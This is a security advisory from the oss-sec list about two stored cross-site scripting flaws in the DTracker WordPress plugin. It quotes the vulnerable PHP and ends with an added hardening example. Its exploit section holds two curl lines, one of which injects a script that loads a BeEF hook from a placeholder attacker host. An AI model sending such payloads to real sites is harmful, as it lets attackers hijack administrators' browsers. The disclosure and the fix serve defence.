oss-sec mailing list archives

Two Content Injection vulnerabilities in Wordpress Plugin DTracker v1.5


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Mon, 20 Mar 2017 20:22:09 -0400

Title: Two Content Injection vulnerabilities in Wordpress Plugin DTracker v1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-08
CVE-ID: CVE-2017-1002006, CVE-2017-1002007
Download Site: https://wordpress.org/plugins/dtracker/
Vendor: https://profiles.wordpress.org/dijo/
Vendor Notified: 2017-03-09
Vendor Contact: plugins () wordpress org
Advisory: http://www.vapidlabs.com/advisory.php?v=186
Description: Track the details of the users downloading the pdf files from wordpress site.
Vulnerability:
CVE-2017-1002006:
In file dtracker/save_contact.php

The script does not check that the requester is authorized before writing contact data into the wp_contacts table. A
single HTTP POST request is enough for any user to add new contacts. A malicious user can therefore store JavaScript in
the database that is later executed in the browser of the admin user (stored cross-site scripting).

    <?php
    // Excerpt from dtracker/save_contact.php: every field is taken straight
    // from $_POST and written to the database without any authorization,
    // nonce or input validation check.
    $name       = $_POST['name'];
    $company    = $_POST['company'];
    $phone      = $_POST['phone'];
    $country    = $_POST['country'];
    $contact_id = $_POST['contact_id'];

    $table = 'wp_contacts';   // table prefix is hard-coded instead of using $wpdb->prefix
    $data  = array(
        'name'    => $name,
        'company' => $company,
        'phone'   => $phone,
        'country' => $country,
    );
    $where = array(
        'id' => $contact_id,
    );

    $wpdb->flush();

    $wpdb->update( $table, $data, $where ); // Update the Contact

CVE-2017-1002007:
In file dtracker/save_mail.php

The script does not check that the requester is authorized before writing new e-mail entries into the wp_contacts
table. A single HTTP POST request is enough for any user to add new contacts. A malicious user can therefore store
JavaScript in the database that is later executed in the browser of the admin user (stored cross-site scripting).


    <?php
    // Excerpt from dtracker/save_mail.php: the visitor-supplied e-mail address
    // is inserted without validation, and the row (including the raw value)
    // is echoed back as JSON.
    $email = $_POST['email'];
    $time  = date('Y-m-d H:i:s');
    $ip    = $_SERVER['REMOTE_ADDR']; // get IP address of the visitor

    $table = "wp_contacts";
    $data  = array(
        'email' => $email,
        'time'  => $time,
        'ip'    => $ip,
    );

    $wpdb->insert( $table, $data );      // Insert Values
    $contact_id = $wpdb->insert_id;      // Get ID of the last inserted row
    $data['contactId'] = $contact_id;
    echo json_encode( $data );           // Pass the id to the JS

Exploit Code:

    $ curl --data "email=\"><script>alert(1);</script>" http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
    {"email":"\\\"><script>alert(1);<\/script>","time":"2017-03-09 00:54:06","ip":"example.com","contactId":10577}

Or better yet, inject a BeEF hook:

    $ curl --data 'email="><script src=http://BeEF_Host:3000/hook.js></script>' http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
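For comparison, the following is an added example of how the save_contact.php logic above could be hardened; it is not the plugin's own code. It assumes the admin-side JavaScript posts to admin-ajax.php with an action named dtracker_save_contact and a nonce created with wp_create_nonce('dtracker_save_contact'); both names are hypothetical. The same four points (authorization, CSRF nonce, input validation, output escaping) apply to save_mail.php, except that its visitor-facing insert is anonymous by design, so there the fix is validating the address with is_email() and escaping the stored value wherever the admin UI renders it.

```php
<?php
// Hardened replacement for dtracker/save_contact.php (added example, not the
// plugin's code). Hook and nonce names are hypothetical assumptions.

add_action( 'wp_ajax_dtracker_save_contact', 'dtracker_example_save_contact' );
// Deliberately no 'wp_ajax_nopriv_' hook: anonymous visitors never reach this handler.

function dtracker_example_save_contact() {
    global $wpdb;

    // 1. Authorization: only users allowed to manage the site may edit contacts.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. CSRF protection: the request must carry a valid nonce for this action
    //    (check_ajax_referer() terminates the request on failure).
    check_ajax_referer( 'dtracker_save_contact', 'nonce' );

    // 3. Input validation: coerce the id to an integer and strip tags from text fields.
    $contact_id = absint( $_POST['contact_id'] ?? 0 );
    if ( 0 === $contact_id ) {
        wp_send_json_error( 'invalid contact id', 400 );
    }
    $data = array(
        'name'    => sanitize_text_field( wp_unslash( $_POST['name'] ?? '' ) ),
        'company' => sanitize_text_field( wp_unslash( $_POST['company'] ?? '' ) ),
        'phone'   => sanitize_text_field( wp_unslash( $_POST['phone'] ?? '' ) ),
        'country' => sanitize_text_field( wp_unslash( $_POST['country'] ?? '' ) ),
    );

    // 4. Use the configured table prefix instead of hard-coding 'wp_', and tell
    //    $wpdb how to format the values (%s for data, %d for the id).
    $table   = $wpdb->prefix . 'contacts';
    $updated = $wpdb->update( $table, $data, array( 'id' => $contact_id ), '%s', '%d' );
    if ( false === $updated ) {
        wp_send_json_error( 'database error', 500 );
    }

    wp_send_json_success( array( 'contactId' => $contact_id ) );
}

// 5. Escape on output wherever a stored value is rendered in the admin UI, so
//    a value that reached the table by any path cannot execute as script.
function dtracker_example_render_contact_name( $name ) {
    return '<td>' . esc_html( $name ) . '</td>';
}
```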

